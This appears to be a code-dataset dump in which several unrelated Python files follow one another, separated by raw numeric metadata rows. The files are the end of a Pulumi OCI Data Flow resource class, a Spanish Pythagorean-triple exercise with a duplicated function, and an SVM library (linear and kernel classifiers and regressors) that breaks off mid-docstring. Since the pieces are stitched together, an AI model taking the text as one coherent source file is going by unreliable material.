The Spark configuration passed to the running process. See https://spark.apache.org/docs/latest/configuration.html#available-properties Example: { "spark.app.name" : "My App Name", "spark.shuffle.io.maxRetries" : "4" } Note: Not all Spark properties are permitted to be set. Attempting to set a property that is not allowed to be overwritten will cause a 400 status to be returned.
"""
return pulumi.get(self, "configuration")
@property
@pulumi.getter(name="dataReadInBytes")
def data_read_in_bytes(self) -> pulumi.Output[str]:
"""
The data read by the run in bytes.
"""
return pulumi.get(self, "data_read_in_bytes")
@property
@pulumi.getter(name="dataWrittenInBytes")
def data_written_in_bytes(self) -> pulumi.Output[str]:
"""
The data written by the run in bytes.
"""
return pulumi.get(self, "data_written_in_bytes")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
A user-friendly name that does not have to be unique. Avoid entering confidential information. If this value is not specified, it will be derived from the associated application's displayName or set by the API using the application file name from fileUri.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="driverShape")
def driver_shape(self) -> pulumi.Output[str]:
"""
The VM shape for the driver. Sets the driver cores and memory.
"""
return pulumi.get(self, "driver_shape")
@property
@pulumi.getter
def execute(self) -> pulumi.Output[str]:
"""
The input used for the spark-submit command. For more details see https://spark.apache.org/docs/latest/submitting-applications.html#launching-applications-with-spark-submit. Supported options include ``--class``, ``--file``, ``--jars``, ``--conf``, ``--py-files``, and the main application file with arguments. Example: ``--jars oci://path/to/a.jar,oci://path/to/b.jar --files oci://path/to/a.json,oci://path/to/b.csv --py-files oci://path/to/a.py,oci://path/to/b.py --conf spark.sql.crossJoin.enabled=true --class org.apache.spark.examples.SparkPi oci://path/to/main.jar 10`` Note: If execute is specified together with applicationId, className, configuration, fileUri, language, arguments, or parameters during application create/update, or run create/submit, the Data Flow service will use only the information derived from the execute input.
"""
return pulumi.get(self, "execute")
@property
@pulumi.getter(name="executorShape")
def executor_shape(self) -> pulumi.Output[str]:
"""
The VM shape for the executors. Sets the executor cores and memory.
"""
return pulumi.get(self, "executor_shape")
@property
@pulumi.getter(name="fileUri")
def file_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the file containing the application to execute. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "file_uri")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter
def language(self) -> pulumi.Output[str]:
"""
The Spark language.
"""
return pulumi.get(self, "language")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
The detailed messages about the lifecycle state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="logsBucketUri")
def logs_bucket_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the bucket where the Spark job logs are to be uploaded. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "logs_bucket_uri")
@property
@pulumi.getter(name="metastoreId")
def metastore_id(self) -> pulumi.Output[str]:
"""
The OCID of Oracle Cloud Infrastructure Hive Metastore.
"""
return pulumi.get(self, "metastore_id")
@property
@pulumi.getter(name="numExecutors")
def num_executors(self) -> pulumi.Output[int]:
"""
The number of executor VMs requested.
"""
return pulumi.get(self, "num_executors")
@property
@pulumi.getter(name="opcRequestId")
def opc_request_id(self) -> pulumi.Output[str]:
"""
Unique Oracle assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.
"""
return pulumi.get(self, "opc_request_id")
@property
@pulumi.getter(name="ownerPrincipalId")
def owner_principal_id(self) -> pulumi.Output[str]:
"""
The OCID of the user who created the resource.
"""
return pulumi.get(self, "owner_principal_id")
@property
@pulumi.getter(name="ownerUserName")
def owner_user_name(self) -> pulumi.Output[str]:
"""
The username of the user who created the resource. If the username of the owner does not exist, `null` will be returned and the caller should refer to the ownerPrincipalId value instead.
"""
return pulumi.get(self, "owner_user_name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Sequence['outputs.InvokeRunParameter']]:
"""
An array of name/value pairs used to fill placeholders found in properties like `Application.arguments`. The name must be a string of one or more word characters (a-z, A-Z, 0-9, _). The value can be a string of 0 or more characters of any kind. Example: [ { name: "iterations", value: "10"}, { name: "input_file", value: "mydata.xml" }, { name: "variable_x", value: "${x}"} ]
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="privateEndpointDnsZones")
def private_endpoint_dns_zones(self) -> pulumi.Output[Sequence[str]]:
"""
An array of DNS zone names. Example: `[ "app.examplecorp.com", "app.examplecorp2.com" ]`
"""
return pulumi.get(self, "private_endpoint_dns_zones")
@property
@pulumi.getter(name="privateEndpointId")
def private_endpoint_id(self) -> pulumi.Output[str]:
"""
The OCID of a private endpoint.
"""
return pulumi.get(self, "private_endpoint_id")
@property
@pulumi.getter(name="privateEndpointMaxHostCount")
def private_endpoint_max_host_count(self) -> pulumi.Output[int]:
"""
The maximum number of hosts to be accessed through the private endpoint. This value is used to calculate the relevant CIDR block and should be a multiple of 256. If the value is not a multiple of 256, it is rounded up to the next multiple of 256. For example, 300 is rounded up to 512.
"""
return pulumi.get(self, "private_endpoint_max_host_count")
@property
@pulumi.getter(name="privateEndpointNsgIds")
def private_endpoint_nsg_ids(self) -> pulumi.Output[Sequence[str]]:
"""
An array of network security group OCIDs.
"""
return pulumi.get(self, "private_endpoint_nsg_ids")
@property
@pulumi.getter(name="privateEndpointSubnetId")
def private_endpoint_subnet_id(self) -> pulumi.Output[str]:
"""
The OCID of a subnet.
"""
return pulumi.get(self, "private_endpoint_subnet_id")
@property
@pulumi.getter(name="runDurationInMilliseconds")
def run_duration_in_milliseconds(self) -> pulumi.Output[str]:
"""
The duration of the run in milliseconds.
"""
return pulumi.get(self, "run_duration_in_milliseconds")
@property
@pulumi.getter(name="sparkVersion")
def spark_version(self) -> pulumi.Output[str]:
"""
The Spark version used to run the application. This value may be set only if applicationId is not set; otherwise, the Spark version is taken from the associated application.
"""
return pulumi.get(self, "spark_version")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of this run.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time an application was created, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
The date and time an application was updated, expressed in [RFC 3339](https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2018-04-03T21:10:29.600Z`
"""
return pulumi.get(self, "time_updated")
@property
@pulumi.getter(name="totalOcpu")
def total_ocpu(self) -> pulumi.Output[int]:
"""
The total number of oCPU requested by the run.
"""
return pulumi.get(self, "total_ocpu")
@property
@pulumi.getter(name="warehouseBucketUri")
def warehouse_bucket_uri(self) -> pulumi.Output[str]:
"""
An Oracle Cloud Infrastructure URI of the bucket to be used as default warehouse directory for BATCH SQL runs. See https://docs.cloud.oracle.com/iaas/Content/API/SDKDocs/hdfsconnector.htm#uriformat.
"""
return pulumi.get(self, "warehouse_bucket_uri")
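# Illustrative usage sketch (not part of the generated provider code). It
# mirrors the Example Usage docstring above, but with hypothetical literal
# OCIDs, and shows how placeholders in `arguments` pair with `parameters`
# (InvokeRunParameterArgs). It is wrapped in a function so importing this
# module does not create resources.
def _example_invoke_run_usage():
    import pulumi_oci as oci
    run = oci.dataflow.InvokeRun(
        "exampleInvokeRun",
        compartment_id="ocid1.compartment.oc1..exampleuniqueid",          # hypothetical OCID
        application_id="ocid1.dataflowapplication.oc1..exampleuniqueid",  # hypothetical OCID
        arguments=["--input", "${input_file}", "--name", "John Doe"],
        parameters=[oci.dataflow.InvokeRunParameterArgs(
            name="input_file",
            value="mydata.xml",
        )],
        display_name="example-run",
    )
    # Look up the state of an existing run by its provider id (see InvokeRun.get).
    return oci.dataflow.InvokeRun.get("existingInvokeRun", id=run.id)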
| 61.588725 | 864 | 0.686946 | 12,553 | 96,140 | 5.086115 | 0.037362 | 0.066504 | 0.057012 | 0.053754 | 0.959434 | 0.94634 | 0.927999 | 0.917849 | 0.90546 | 0.872976 | 0 | 0.004988 | 0.205492 | 96,140 | 1,560 | 865 | 61.628205 | 0.830868 | 0.477803 | 0 | 0.735912 | 1 | 0 | 0.117781 | 0.030746 | 0 | 0 | 0 | 0 | 0 | 1 | 0.170166 | false | 0.001105 | 0.007735 | 0.003315 | 0.283978 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
704269a69696036d378bf997b226dc4f61c15926 | 1,349 | py | Python | tareas/funcion_pitagora.py | PythonCisco/clase | 6e18715012ce72385637b7f09a0a9c810165f1af | ["MIT"] | null | null | null | tareas/funcion_pitagora.py | PythonCisco/clase | 6e18715012ce72385637b7f09a0a9c810165f1af | ["MIT"] | null | null | null | tareas/funcion_pitagora.py | PythonCisco/clase | 6e18715012ce72385637b7f09a0a9c810165f1af | ["MIT"] | null | null | null |
"""
Anselmo Mc Taggart
2022-02-11
"""
def terna_pitagorica(n1, n2, n3):
"""Imprime si los tres argumentos forman una terna pitagórica.
No puede distinguir si el orden de los valores no es a, b, c.
Los dos primeros tienen que ser los catetos, el último debe ser la hipotenusa.
No retorna nada, solo imprime.
"""
a = n1 * n1
b = n2 * n2
c = n3 * n3
print(a)
print(b)
print(c)
if a + b == c:
print(" TRUE Es una Terna Pitagorica")
else:
print(" FALSE No una Terna Pitagorica")
terna_pitagorica(3, 4, 5)
def terna_pitagorica(n1, n2, n3):
"""Imprime si los tres argumentos forman una terna pitagórica.
No puede distinguir si el orden de los valores no es a, b, c.
Los dos primeros tienen que ser los catetos, el último debe ser la hipotenusa.
No retorna nada, solo imprime.
"""
# square each value
a = n1 * n1
b = n2 * n2
c = n3 * n3
# check whether the squares satisfy a^2 + b^2 = c^2
if a + b == c:
terna = True
else:
terna = False
return terna
def imprime_terna(n1, n2, n3):
# print the input values
a, b, c = n1, n2, n3
print(a)
print(b)
print(c)
if terna_pitagorica(a, b, c):
print(" TRUE Es una Terna Pitagorica")
else:
print(" FALSE No una Terna Pitagorica")
| 21.412698 | 83 | 0.581913 | 202 | 1,349 | 3.861386 | 0.277228 | 0.153846 | 0.023077 | 0.05 | 0.789744 | 0.789744 | 0.789744 | 0.789744 | 0.735897 | 0.697436 | 0 | 0.038631 | 0.328391 | 1,349 | 62 | 84 | 21.758065 | 0.822296 | 0 | 0 | 0.766667 | 0 | 0 | 0.170767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5624f6f5b41df397c85012e9df9fea2425a1d5c5 | 29,348 | py | Python | pysvm/svm.py | Kaslanarian/PythonSVM | 715eeef2a245736167addf45a6aee8b40b54d0c7 | ["MIT"] | 2 | 2021-09-25T01:00:37.000Z | 2021-09-27T12:13:24.000Z | pysvm/svm.py | Kaslanarian/PythonSVM | 715eeef2a245736167addf45a6aee8b40b54d0c7 | ["MIT"] | 1 | 2021-09-17T12:08:14.000Z | 2021-09-17T12:08:14.000Z | pysvm/svm.py | Kaslanarian/PythonSVM | 715eeef2a245736167addf45a6aee8b40b54d0c7 | ["MIT"] | null | null | null |
import numpy as np
from sklearn.base import BaseEstimator
from sklearn.metrics import accuracy_score, r2_score
from sklearn.multiclass import OneVsOneClassifier, OneVsRestClassifier
from .rff import NormalRFF
from .solver import Solver, SolverWithCache, NuSolver, NuSolverWithCache
class BiLinearSVC(BaseEstimator):
r'''Binary linear SVM. This class is inherited by the multiclass LinearSVC, so you normally do not need to use it directly.
It solves the dual problem
.. math:: \min_{\pmb\alpha}\quad&\dfrac12\pmb\alpha^\top Q\pmb\alpha-\pmb{e}^\top\pmb{\alpha}\\
\text{s.t.}\quad& \pmb{y}^\top\pmb\alpha=0,\\
&0\leqslant\alpha_i\leqslant C,i=1,\cdots ,l
to obtain the decision boundary
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i\pmb x_i^T\pmb x-\rho
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, 1 by default;
max_iter : int, default=1000
Maximum number of SMO iterations, 1000 by default;
tol : float, default=1e-5
Tolerance of the SMO algorithm, 1e-5 by default;
cache_size : int, default=256
Size of the LRU cache, 256 by default; if 0, no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
C: float = 1.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__()
self.C = C
self.max_iter = max_iter
self.tol = tol
self.cache_size = cache_size
def fit(self, X: np.ndarray, y: np.ndarray):
'''Train the model.
Parameters
----------
X : np.ndarray
Training features;
y : np.array
Training labels; 0 is recommended as the negative label and 1 as the positive label.
'''
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = -np.ones(l)
w = np.zeros(self.n_features)
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * np.matmul(X, X.T)
solver = Solver(Q, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
return y * np.matmul(X, X[i]) * y[i]
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
delta_i, delta_j = solver.update(i, j, func)
w += delta_i * y[i] * X[i] + delta_j * y[j] * X[j]
else:
print("LinearSVC not coverage with {} iterations".format(
self.max_iter))
self.coef_ = (w, solver.calculate_rho())
return self
def decision_function(self, X: np.ndarray) -> np.ndarray:
'''Decision function; returns the raw decision values.'''
return np.matmul(self.coef_[0], np.array(X).T) - self.coef_[-1]
def predict(self, X: np.ndarray) -> np.ndarray:
'''Prediction function; returns the predicted labels (0/1).'''
return (self.decision_function(np.array(X)) >= 0).astype(int)
def score(self, X: np.ndarray, y: np.ndarray) -> float:
'''Scoring function; given features and labels, returns the accuracy.'''
return accuracy_score(y, self.predict(X))
class LinearSVC(BiLinearSVC):
r'''Multiclass linear SVM; multiclass classification is implemented with sklearn's multiclass module.
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, 1 by default;
max_iter : int, default=1000
Maximum number of SMO iterations, 1000 by default;
tol : float, default=1e-5
Tolerance of the SMO algorithm, 1e-5 by default;
cache_size : int, default=256
Size of the LRU cache, 256 by default; if 0, no cache is used and the full Q matrix is computed before solving;
multiclass : {"ovr", "ovo"}, default="ovr"
Multiclass strategy, ovr (one-vs-rest) or ovo (one-vs-one), "ovr" by default;
n_jobs : int, default=None
Number of CPUs to use in parallel; by default no parallelism is used.
'''
def __init__(self,
C: float = 1.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs=None) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.multiclass = multiclass
self.n_jobs = n_jobs
params = {
"estimator": BiLinearSVC(C, max_iter, tol, cache_size),
"n_jobs": n_jobs,
}
self.multiclass_model: OneVsOneClassifier = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
'''Train the model.
Parameters
----------
X : np.ndarray
Training features;
y : np.array
Training labels; 0 is recommended as the negative label and 1 as the positive label.
Return
------
self : LinearSVC
'''
self.multiclass_model.fit(X, y)
return self
def decision_function(self, X: np.ndarray):
return self.multiclass_model.decision_function(X)
def predict(self, X: np.ndarray):
return self.multiclass_model.predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return self.multiclass_model.score(X, y)
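# Illustrative usage sketch (not part of the library): fit the multiclass
# LinearSVC defined above on a small sklearn dataset. The dataset choice and
# the standardization step are assumptions made only for this example.
def _linear_svc_example() -> float:
    from sklearn.datasets import load_iris
    from sklearn.preprocessing import StandardScaler
    X, y = load_iris(return_X_y=True)
    X = StandardScaler().fit_transform(X)  # scaled features help the SMO-style solver
    model = LinearSVC(C=1., max_iter=1000).fit(X, y)
    return model.score(X, y)  # mean accuracy on the training data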
class LinearSVR(BiLinearSVC):
r'''Linear SVM regression (SVR).
The original dual problem is
.. math:: \min_{\pmb{\alpha},\pmb{\alpha}^*}\quad&\dfrac12(\pmb{\alpha}-\pmb{\alpha}^*)^\top Q(\pmb{\alpha}-\pmb{\alpha}^*)+\varepsilon\sum_{i=1}^l(\alpha_i+\alpha_i^*)+\sum_{i=1}^l z_i({\alpha}_i-{\alpha}_i^*)\\
\text{s.t.}\quad&\pmb e^\top(\pmb{\alpha}-\pmb{\alpha}^*)=0\\
&0\leqslant\alpha_i,\alpha^*_i\leqslant C,i=1,\cdots ,l
We turn it into a single-variable optimization problem and solve it with SMO (see https://welts.xyz/2021/09/16/svr/), which gives the decision function
.. math:: f(\pmb x)=\sum_{i=1}^l(-\alpha_i+\alpha_i^*)\pmb x_i^T\pmb x-\rho
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, 1 by default;
eps : float, default=0
Parameter of the :math:`\varepsilon`-hinge loss;
max_iter : int, default=1000
Maximum number of SMO iterations, 1000 by default;
tol : float, default=1e-5
Tolerance of the SMO algorithm, 1e-5 by default;
cache_size : int, default=256
Size of the LRU cache, 256 by default; if 0, no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
C: float = 1.,
eps: float = 0.,
max_iter: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.eps = eps
def fit(self, X: np.ndarray, y: np.ndarray):
'''Train the model.
Parameters
----------
X : np.ndarray
Training features;
y : np.array
Training targets.
Return
------
self : LinearSVR
'''
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1., -1.
p = np.ones(2 * l) * self.eps
p[:l] -= z
p[l:] += z
w = np.zeros(self.n_features)
if self.cache_size == 0:
Q = np.matmul(X, X.T)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = Solver(Q4, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
if i < l:
Qi = np.matmul(X, X[i])
else:
Qi = -np.matmul(X, X[i - l])
return np.hstack((Qi, -Qi))
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
delta_i, delta_j = solver.update(i, j, func)
w += (delta_i * y[i] * X[i if i < l else i - l] +
delta_j * y[j] * X[j if j < l else j - l])
else:
print("LinearSVR not coverage with {} iterations".format(
self.max_iter))
self.coef_ = (w, solver.calculate_rho())
return self
def decision_function(self, X: np.ndarray):
return super().decision_function(X)
def predict(self, X: np.ndarray):
'''Prediction function; returns the predicted values.'''
return self.decision_function(X)
def score(self, X: np.ndarray, y: np.ndarray):
'''Scoring function; given features and targets, returns the r2 score.'''
return r2_score(y, self.predict(X))
class BiKernelSVC(BiLinearSVC):
r'''Binary kernel SVM. This class is inherited by the multiclass KernelSVC, so you normally do not need to use it directly. The optimization problem is the same as in BiLinearSVC; only the definition of the Q matrix differs.
The decision boundary is
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i K(\pmb x_i, \pmb x)-\rho
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, 1 by default;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, 3 by default;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; "scale" means 1 / (n_features * X.var()) and "auto" means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function; it is only meaningful for "poly" and "sigmoid";
max_iter : int, default=1000
Maximum number of SMO iterations, 1000 by default;
rff : bool, default=False
Whether to use random Fourier features, False by default;
D : int, default=1000
Number of random Fourier feature samples, 1000 by default;
tol : float, default=1e-5
Tolerance of the SMO algorithm, 1e-5 by default;
cache_size : int, default=256
Size of the LRU cache, 256 by default; if 0, no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
C: float = 1.,
kernel: str = 'rbf',
degree: float = 3,
gamma: str = 'scale',
coef0: float = 0,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.kernel = kernel
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.rff = rff
self.D = D
def register_kernel(self, std: float):
'''Register the kernel function.
Parameters
----------
std : standard deviation of the input data, used for the gamma='scale' case
'''
if type(self.gamma) == str:
gamma = {
'scale': 1 / (self.n_features * std),
'auto': 1 / self.n_features,
}[self.gamma]
else:
gamma = self.gamma
if self.rff:
rff = NormalRFF(gamma, self.D).fit(np.ones((1, self.n_features)))
rbf_func = lambda x, y: np.matmul(rff.transform(x),
rff.transform(y).T)
else:
rbf_func = lambda x, y: np.exp(-gamma * (
(x**2).sum(1, keepdims=True) +
(y**2).sum(1) - 2 * np.matmul(x, y.T)))
degree = self.degree
coef0 = self.coef0
return {
"linear": lambda x, y: np.matmul(x, y.T),
"poly": lambda x, y: (gamma * np.matmul(x, y.T) + coef0)**degree,
"rbf": rbf_func,
"sigmoid": lambda x, y: np.tanh(gamma * np.matmul(x, y.T) + coef0)
}[self.kernel]
def fit(self, X: np.ndarray, y: np.ndarray):
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = -np.ones(l)
kernel_func = self.register_kernel(X.std())
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * kernel_func(X, X)
solver = Solver(Q, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
return y * kernel_func(X, X[i:i + 1]).reshape(-1) * y[i]
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("KernelSVC not coverage with {} iterations".format(
self.max_iter))
self.decision_function = lambda x: np.matmul(
solver.alpha * y,
kernel_func(X, x),
) - solver.calculate_rho()
return self
def predict(self, X: np.ndarray) -> np.ndarray:
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray) -> float:
return super().score(X, y)
class KernelSVC(LinearSVC, BiKernelSVC):
r'''Multiclass kernel SVM.
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, 1 by default;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, 3 by default;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; "scale" means 1 / (n_features * X.var()) and "auto" means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function; it is only meaningful for "poly" and "sigmoid";
max_iter : int, default=1000
Maximum number of SMO iterations, 1000 by default;
rff : bool, default=False
Whether to use random Fourier features, False by default;
D : int, default=1000
Number of random Fourier feature samples, 1000 by default;
tol : float, default=1e-5
Tolerance of the SMO algorithm, 1e-5 by default;
cache_size : int, default=256
Size of the LRU cache, 256 by default; if 0, no cache is used and the full Q matrix is computed before solving;
multiclass : {"ovr", "ovo"}, default="ovr"
Multiclass strategy, ovr (one-vs-rest) or ovo (one-vs-one), "ovr" by default;
n_jobs : int, default=None
Number of CPUs to use in parallel; by default no parallelism is used.
'''
def __init__(self,
C: float = 1.,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs: int = None) -> None:
super().__init__(C, max_iter, tol, cache_size)
self.kernel = kernel
self.gamma = gamma
self.degree = degree
self.coef0 = coef0
self.rff = rff
self.D = D
params = {
"estimator":
BiKernelSVC(C, kernel, degree, gamma, coef0, max_iter, rff, D, tol,
cache_size),
"n_jobs":
n_jobs,
}
self.multiclass_model = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
return super().fit(X, y)
def decision_function(self, X: np.ndarray):
return super().decision_function(X)
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
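# Usage sketch (illustrative only, not part of the original module): fit the
# multi-class KernelSVC on a small synthetic problem. scikit-learn is assumed
# to be available, as the module already relies on its one-vs-rest / one-vs-one
# wrappers; the function name and dataset are hypothetical.
def _demo_kernel_svc():
    from sklearn.datasets import make_classification
    X, y = make_classification(n_samples=200, n_features=5, n_informative=3,
                               n_classes=3, random_state=0)
    clf = KernelSVC(C=1., kernel='rbf', max_iter=1000)
    clf.fit(X, y)
    print("train accuracy:", (clf.predict(X) == y).mean())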
class KernelSVR(BiKernelSVC):
r'''Kernel support vector regression.
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, default 1;
eps : float, default=0
Parameter of the :math:`\varepsilon`-hinge loss;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, default 3;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; 'scale' means 1 / (n_features * X.var()) and 'auto' means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function. It is only used by "poly" and "sigmoid";
max_iter : int, default=1000
Number of SMO iterations, default 1000;
rff : bool, default=False
Whether to use random Fourier features, default False;
D : int, default=1000
Number of random Fourier feature samples, default 1000;
tol : float, default=1e-5
Tolerance of the SMO algorithm, default 1e-5;
cache_size : int, default=256
LRU cache size, default 256; if 0 no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
C: float = 1.,
eps: float = 0.,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.eps = eps
def fit(self, X: np.ndarray, y: np.ndarray):
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1., -1.
p = np.ones(2 * l) * self.eps
p[:l] -= z
p[l:] += z
kernel_func = self.register_kernel(X.std())
if self.cache_size == 0:
Q = kernel_func(X, X)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = Solver(Q4, p, y, self.C, self.tol)
else:
solver = SolverWithCache(p, y, self.C, self.tol, self.cache_size)
def func(i):
if i < l:
Qi = kernel_func(X, X[i:i + 1]).reshape(-1)
else:
Qi = -kernel_func(X, X[i - l:i - l + 1]).reshape(-1)
return np.hstack((Qi, -Qi))
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("KernelSVR not coverage with {} iterations".format(
self.max_iter))
self.decision_function = lambda x: np.matmul(
solver.alpha[:l] - solver.alpha[l:],
kernel_func(X, x),
) - solver.calculate_rho()
return self
def predict(self, X: np.ndarray):
'''Prediction function: return the predicted values.'''
return self.decision_function(np.array(X))
def score(self, X: np.ndarray, y: np.ndarray):
'''Evaluation function: given features and labels, return the R2 score.'''
return r2_score(y, self.predict(X))
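# Usage sketch (illustrative only, not part of the original module):
# epsilon-insensitive kernel regression on a noisy sine curve; eps is the tube
# width described in the docstring above. Only numpy is assumed.
def _demo_kernel_svr():
    rng = np.random.RandomState(0)
    X = np.linspace(0, 6, 200).reshape(-1, 1)
    y = np.sin(X).ravel() + 0.1 * rng.randn(200)
    reg = KernelSVR(C=10., eps=0.1, kernel='rbf')
    reg.fit(X, y)
    print("train R^2:", reg.score(X, y))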
class BiNuSVC(BiKernelSVC):
r'''Binary NuSVM, which controls the number of support vectors through the parameter :math:`\nu`.
It solves the dual problem
.. math:: \min_{\pmb\alpha}\quad&\dfrac12\pmb\alpha^\top Q\pmb\alpha\\
\text{s.t.}\quad&0\leqslant\alpha_i\leqslant\frac{1}{l},i=1,\cdots,l\\
&\pmb{e}^\top\pmb\alpha\geqslant \nu,\pmb y^\top\pmb{\alpha}=0
and obtains the decision function
.. math:: f(\pmb x)=\sum_{i=1}^ly_i\alpha_i\pmb K(\pmb x_i,\pmb x)-\rho
Parameters
----------
nu : float, default=0.5
Parameter of NuSVM that controls the number of support vectors;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
